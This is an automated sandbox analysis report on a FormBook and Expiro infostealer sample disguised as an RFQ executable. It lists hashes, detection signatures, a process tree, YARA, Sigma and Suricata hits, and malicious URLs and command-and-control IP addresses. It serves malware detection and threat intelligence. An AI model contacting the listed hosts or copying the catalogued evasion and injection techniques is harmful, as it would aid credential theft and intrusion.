Edit tour

Windows Analysis Report
RFQ _ Virtue 054451000085.exe

Overview

General Information

Sample name:	RFQ _ Virtue 054451000085.exe
Analysis ID:	1571270
MD5:	dd6599c8b0d09a38d88ef2c1e1720a6c
SHA1:	d538a849b763558e1577817593d00691e382b81a
SHA256:	ed0b66043d5223c79f2206468bd12d369d933e0db2234508702ce7402579835f
Tags:	exeWormm0yvuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files in the system32 config directory

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Uncommon Svchost Parent Process

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

RFQ _ Virtue 054451000085.exe (PID: 5784 cmdline: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe" MD5: DD6599C8B0D09A38D88EF2C1E1720A6C)

svchost.exe (PID: 2268 cmdline: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

iavbXasnTxCeiF.exe (PID: 5396 cmdline: "C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

choice.exe (PID: 3576 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

iavbXasnTxCeiF.exe (PID: 5576 cmdline: "C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1196 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 30AE870CC81481FC14F2B11D911AB42F)

armsvc.exe (PID: 1588 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 785A052E614E12F8A62CD368B4273290)

alg.exe (PID: 2168 cmdline: C:\Windows\System32\alg.exe MD5: 5DBFDD947810E81DAFCE72FA7C481167)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 736 cmdline: C:\Windows\system32\AppVClient.exe MD5: 1D7D22CFCA51F1A73A539A64CC53B616)

FXSSVC.exe (PID: 6424 cmdline: C:\Windows\system32\fxssvc.exe MD5: 2F8DCF43C75A2511D20EB9E59E43AB07)

maintenanceservice.exe (PID: 1196 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: A46C8436F8D489B69D8BDDEB6C9361EB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", CommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", ParentImage: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe, ParentProcessId: 5784, ParentProcessName: RFQ _ Virtue 054451000085.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", ProcessId: 2268, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", CommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", ParentImage: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe, ParentProcessId: 5784, ParentProcessName: RFQ _ Virtue 054451000085.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", ProcessId: 2268, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:32:00.400791+0100	2051649	1	A Network Trojan was detected	192.168.2.7	55011	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:31:51.722646+0100	2051648	1	A Network Trojan was detected	192.168.2.7	55926	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:31:43.820628+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.7	49706	TCP
2024-12-09T08:31:47.049148+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.7	49707	TCP
2024-12-09T08:31:51.782086+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.7	49709	TCP
2024-12-09T08:33:37.375955+0100	2018141	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.7	49837	TCP
2024-12-09T08:33:40.161940+0100	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.7	49844	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:31:43.820628+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.7	49706	TCP
2024-12-09T08:31:47.049148+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.7	49707	TCP
2024-12-09T08:31:51.782086+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.7	49709	TCP
2024-12-09T08:33:37.375955+0100	2037771	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.7	49837	TCP
2024-12-09T08:33:40.161940+0100	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.7	49844	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:32:39.722151+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49722	217.70.184.50	80	TCP
2024-12-09T08:33:04.952823+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49753	154.23.184.207	80	TCP
2024-12-09T08:33:21.001094+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49793	38.165.29.234	80	TCP
2024-12-09T08:33:36.031248+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49833	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:32:56.947433+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49735	154.23.184.207	80	TCP
2024-12-09T08:32:59.612568+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49741	154.23.184.207	80	TCP
2024-12-09T08:33:02.268891+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49747	154.23.184.207	80	TCP
2024-12-09T08:33:12.398406+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49774	38.165.29.234	80	TCP
2024-12-09T08:33:15.082147+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49781	38.165.29.234	80	TCP
2024-12-09T08:33:17.769352+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49787	38.165.29.234	80	TCP
2024-12-09T08:33:27.762203+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49813	13.248.169.48	80	TCP
2024-12-09T08:33:30.438993+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49820	13.248.169.48	80	TCP
2024-12-09T08:33:33.198157+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49826	13.248.169.48	80	TCP
2024-12-09T08:33:43.193931+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49852	156.251.17.224	80	TCP
2024-12-09T08:33:47.285549+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49865	156.251.17.224	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:31:42.841913+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.7	49705	18.141.10.107	80	TCP
2024-12-09T08:32:48.923482+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.7	49720	82.112.184.197	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: RFQ _ Virtue 054451000085.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://54.244.188.177/h	Avira URL Cloud: Label: phishing
Source: http://www.duwixushx.xyz/u11p/	Avira URL Cloud: Label: malware
Source: http://www.duwixushx.xyz	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\FXSSVC.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe	Avira: detection malicious, Label: W32/Infector.Gen

Multi AV Scanner detection for submitted file

Source: RFQ _ Virtue 054451000085.exe	ReversingLabs: Detection: 81%
Source: RFQ _ Virtue 054451000085.exe	Virustotal: Detection: 75%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\FXSSVC.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: RFQ _ Virtue 054451000085.exe

Joe Sandbox ML: detected

Source: RFQ _ Virtue 054451000085.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: choice.pdbGCTL source: svchost.exe, 0000000A.00000003.1915858203.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1914993695.000000000341A000.00000004.00000020.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000003.1891549691.00000000014A5000.00000004.00000001.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000002.2748610451.000000000148E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1491077999.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518745124.0000000004190000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source:	Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
Source:	Binary string: ALG.pdbGCTL source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495810480.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source:	Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518745124.0000000004190000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1530790654.0000000004180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1530790654.0000000004180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iavbXasnTxCeiF.exe, 0000000D.00000002.2742686051.000000000021E000.00000002.00000001.01000000.00000005.sdmp, iavbXasnTxCeiF.exe, 00000011.00000000.2031373413.000000000021E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1534604945.0000000005060000.00000004.00001000.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1532831867.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1839279919.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1841739814.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1953424906.0000000004257000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1948543283.00000000040A4000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.000000000459E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.0000000004400000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1534604945.0000000005060000.00000004.00001000.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1532831867.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000A.00000003.1839279919.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1841739814.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1953424906.0000000004257000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1948543283.00000000040A4000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.000000000459E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.0000000004400000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
Source:	Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
Source:	Binary string: ALG.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495810480.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source:	Binary string: choice.pdb source: svchost.exe, 0000000A.00000003.1915858203.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1914993695.000000000341A000.00000004.00000020.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000003.1891549691.00000000014A5000.00000004.00000001.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000002.2748610451.000000000148E000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe	Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:55926 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:55011 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49705 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49722 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49735 -> 154.23.184.207:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49720 -> 82.112.184.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49741 -> 154.23.184.207:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49747 -> 154.23.184.207:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49753 -> 154.23.184.207:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49774 -> 38.165.29.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49781 -> 38.165.29.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49787 -> 38.165.29.234:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49793 -> 38.165.29.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49813 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49820 -> 13.248.169.48:80
